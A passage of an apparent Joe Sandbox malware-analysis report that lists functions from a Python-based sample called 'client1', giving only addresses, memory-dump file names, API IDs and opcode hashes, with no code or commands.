                                                    • Instruction ID: 7b828c5245223a57c2c0424083bb7dcff172cb00f5949faab49e71464004ea4b
                                                    • Opcode Fuzzy Hash: 9c8937bca7593cf83dc6e6686b6a5b89807f230b44c95862bfa962c91a770e15
                                                    • Instruction Fuzzy Hash: 01F0F6A0B0BB43D6EA12AF25E81417A63ACBF18B84B4610B5CD4E06754EF2CE4468370
                                                    Function 00007FFBAB4A1A5B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>$x
                                                    • API String ID: 4228545439-1318447075
                                                    • Opcode ID: fd32d0dcf243e6a103357d3eecc08cffb1178327e1ffa54b9ecb0fce546568fc
                                                    • Instruction ID: 106bd933cbb8997b1ed16ed3e13d6de9026b52029ff9ecff94ca231a83bef512
                                                    • Opcode Fuzzy Hash: fd32d0dcf243e6a103357d3eecc08cffb1178327e1ffa54b9ecb0fce546568fc
                                                    • Instruction Fuzzy Hash: 63F03AE6E0BA0381FA135B76E8443785262AF41BA5F04C13DDD3D072B0EE3DA586A300
                                                    Function 00007FFBAB4A1D5F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>$t
                                                    • API String ID: 4228545439-2084846924
                                                    • Opcode ID: a5e764b775898502673028de2063cceef28fcfa4bb572bce9f2f1c4761633420
                                                    • Instruction ID: a1360611d0392cdc2b00a83fb5bea55752a941344025b6786022390caa8a80cd
                                                    • Opcode Fuzzy Hash: a5e764b775898502673028de2063cceef28fcfa4bb572bce9f2f1c4761633420
                                                    • Instruction Fuzzy Hash: 97F017E6A4BA0241FA235B76E84037852616F41BA5F04C13DCD3D072B4EE3CB4866301
                                                    Function 00007FF79F6388E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                    • Instruction ID: 46445f8685af585de1a2bd3e6bf8cc80228188c3258e4f9d9d5d6f64c18f88db
                                                    • Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                    • Instruction Fuzzy Hash: 10F0AF71A0978291EA30BB34A8843B9932AAF897B5FC40235C57D466E4CF6CD448C320
                                                    Function 00007FFBAA6FFFB0 Relevance: 7.6, APIs: 5, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Bool_ContextDeallocFromLongVar_
                                                    • String ID:
                                                    • API String ID: 2775757836-0
                                                    • Opcode ID: 9fc999d3ba75a32fdb54f31e92babdd73ad3fd271dbd89d704e32f932863f8a2
                                                    • Instruction ID: 2cdea35e9693340ac105485f7d2be8e1d4e400b9a20000832ffa7727bbaeebce
                                                    • Opcode Fuzzy Hash: 9fc999d3ba75a32fdb54f31e92babdd73ad3fd271dbd89d704e32f932863f8a2
                                                    • Instruction Fuzzy Hash: 305184A190EA42E1E6A68F35E8406BB67A8FB54BA4F140072DD4F137A4DF7CE447C721
                                                    Function 00007FFBAA706908 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PyMem_Malloc.PYTHON311(?,?,?,00007FFBAA706856,?,?,?,00007FFBAA706720), ref: 00007FFBAA706966
                                                    • _PyUnicode_Ready.PYTHON311(?,?,?,00007FFBAA706856,?,?,?,00007FFBAA706720), ref: 00007FFBAA715408
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: MallocMem_ReadyUnicode_
                                                    • String ID:
                                                    • API String ID: 3281404053-0
                                                    • Opcode ID: 30e0139b3815385f5b23148af59c0299b05e058a65a50942f00168a3156b7151
                                                    • Instruction ID: e755a4a22572fb7cf75ca95826c7dd89cd976b2e861286586bdf2d271a2918ef
                                                    • Opcode Fuzzy Hash: 30e0139b3815385f5b23148af59c0299b05e058a65a50942f00168a3156b7151
                                                    • Instruction Fuzzy Hash: 2F4103D2A1E642D5FA268F35C51067B9AD8AF04B95F0801BACE5E176E1DE6CE4038260
                                                    Function 00007FFBAA70236C Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 2eb98609505ade398a1f2fa3cea2013fae65fc26c2a371eaf814e5ae544d8ab8
                                                    • Instruction ID: c5a142b0a009bf4fc301b3fd07a4cea32baf4d964182b28a657b4229fe0d2db4
                                                    • Opcode Fuzzy Hash: 2eb98609505ade398a1f2fa3cea2013fae65fc26c2a371eaf814e5ae544d8ab8
                                                    • Instruction Fuzzy Hash: 464161A3A16A43E5EB16CF71D8000FE27ACFB44B98B540472EE0D13654DE39D947C3A0
                                                    Function 00007FFBAA7026E0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatFreeMem_Object_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 2710705848-0
                                                    • Opcode ID: f8b5880e058feb30f40d9a99ab03f2cf55a0e9456d889b2afcbd3e7c01f68696
                                                    • Instruction ID: c564d343808237fead81064d1bbb2ca2477877694103a363e18d3ebd01fd8dd5
                                                    • Opcode Fuzzy Hash: f8b5880e058feb30f40d9a99ab03f2cf55a0e9456d889b2afcbd3e7c01f68696
                                                    • Instruction Fuzzy Hash: F13130B2A1AA52D5EB528F75D8500BE2BA8EB44B98B441072DF0D23795DE3CE547C360
                                                    Function 00007FFBAA703ECC Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 23c7c4e907ba45c6af6447aa0c48932a4cd58f76ea433114e7588b02fba90776
                                                    • Instruction ID: e5a18323b384d90de4571a660cc60fc9f9d4572dc46037d69132cb8d452fcf40
                                                    • Opcode Fuzzy Hash: 23c7c4e907ba45c6af6447aa0c48932a4cd58f76ea433114e7588b02fba90776
                                                    • Instruction Fuzzy Hash: 993142B2A1AA12D5EB168F75D8540BE27B8BB44B94F440472EE0E63694DF3CE647C360
                                                    Function 00007FFBAA701F84 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFreeMem_$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1618042208-0
                                                    • Opcode ID: 2fcf51f0f26801561f4a78d24dbc4f03f7393a52fa4a32d185c28099360c8641
                                                    • Instruction ID: 585a36686dce6e70d39410b17bc4a06009ee09cf273ba2dddf75116281343813
                                                    • Opcode Fuzzy Hash: 2fcf51f0f26801561f4a78d24dbc4f03f7393a52fa4a32d185c28099360c8641
                                                    • Instruction Fuzzy Hash: 883130B2A0AB12D5EB068F75D8440BE27A8EB44B94F445072DF0E23695EF3DE547C3A0
                                                    Function 00007FFBAA703FE0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 0152a94ac5eac63f6c275ae3eff6ae87a3f54153c00ff26e7e718e24daed6530
                                                    • Instruction ID: 3271c5503017826177d60bcecc02c9b79e470316fe51cf7991d499363a8fbcf2
                                                    • Opcode Fuzzy Hash: 0152a94ac5eac63f6c275ae3eff6ae87a3f54153c00ff26e7e718e24daed6530
                                                    • Instruction Fuzzy Hash: 143146B2A0AA12D5EB128F75D8501BE27A8AB44B98F4444B2DE0D23B55DF3DD547C360
                                                    Function 00007FFBAA703BB0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: c99b41413d410a8b66f42f518482b412da07e09b94962971e60b9209a433efc0
                                                    • Instruction ID: 2aaef4a6639d04e8705dfa0ec5941545e16aae6ab463132e98d2eb049a2a8c5e
                                                    • Opcode Fuzzy Hash: c99b41413d410a8b66f42f518482b412da07e09b94962971e60b9209a433efc0
                                                    • Instruction Fuzzy Hash: FA3160B2A1AB12D5EB068F75C8500BF27A8AB44B98F451472DE0E63794DF3CE647D360
                                                    Function 00007FFBAA6F108C Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: d5ca5b28589d4e6d2b8bd04fb83bbc7e78b4048249ef0d5a38071d01309e3705
                                                    • Instruction ID: 397ab95476c0a3838d0415400d4428164af4aed7f4783026c30fad649b457e1e
                                                    • Opcode Fuzzy Hash: d5ca5b28589d4e6d2b8bd04fb83bbc7e78b4048249ef0d5a38071d01309e3705
                                                    • Instruction Fuzzy Hash: DA3149B2A0AA12D5EB12CF75CC100BD27A8AB45FD8F445072DF0E16A98DE3DE54BC760
                                                    Function 00007FFBAA701C78 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 549e87ffac2dbbd270a4a4522544f66e8e3e8ec5ff4bf2f4d6eee3c28c79323e
                                                    • Instruction ID: 38feedfd66ea00667f1a8907df53ec052169023f5a987126323f3b1e41a45197
                                                    • Opcode Fuzzy Hash: 549e87ffac2dbbd270a4a4522544f66e8e3e8ec5ff4bf2f4d6eee3c28c79323e
                                                    • Instruction Fuzzy Hash: 80314DB2A0AB52D5EB168F75D8500FE27A8EB44B98F441072DE0E27A94DF3CE547C360
                                                    Function 00007FFBAA6F5478 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 6e8a08d0135609d64f5edfada00e1e148f46bb7b6facc918f4d2b70e0637a521
                                                    • Instruction ID: 3904dc79bd2294a6c708686d0003a42740f7af4123e76290482c43334ef490d1
                                                    • Opcode Fuzzy Hash: 6e8a08d0135609d64f5edfada00e1e148f46bb7b6facc918f4d2b70e0637a521
                                                    • Instruction Fuzzy Hash: 5A317EB2A1AA02C5EB028F79D9001BD27A9EB44F98F441076DF0E17694DF3DE94BC760
                                                    Function 00007FFBAA704C68 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 598ef48ed3feb993cd3434401894e552203ae3f77933b81a56c8fa31284e1aef
                                                    • Instruction ID: 37c76b311fd816f4d46da8be9be39798d0c86bbbe98ed871d229e8046328b779
                                                    • Opcode Fuzzy Hash: 598ef48ed3feb993cd3434401894e552203ae3f77933b81a56c8fa31284e1aef
                                                    • Instruction Fuzzy Hash: 373130B2A0AA22D5EB129F75D8140BE27A8BB44B94F445072EF0D27794EF3CE547C360
                                                    Function 00007FFBAA6F50D4 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatFreeMem_Object_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 2710705848-0
                                                    • Opcode ID: 9bf83651b9248913a87182242b3306fade458d8e5a4bdc2252f3f6c05ce57619
                                                    • Instruction ID: 2086f882e8e912dde4b4efe1fba88a1c93d6b547ebab494b4c4a874429fc88eb
                                                    • Opcode Fuzzy Hash: 9bf83651b9248913a87182242b3306fade458d8e5a4bdc2252f3f6c05ce57619
                                                    • Instruction Fuzzy Hash: C2316CB2A0AA12D5EB02CF75CD001BD27A8AB44F98B441076EE0E16A94DE3CE54BC760
                                                    Function 00007FFBAA7020A0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
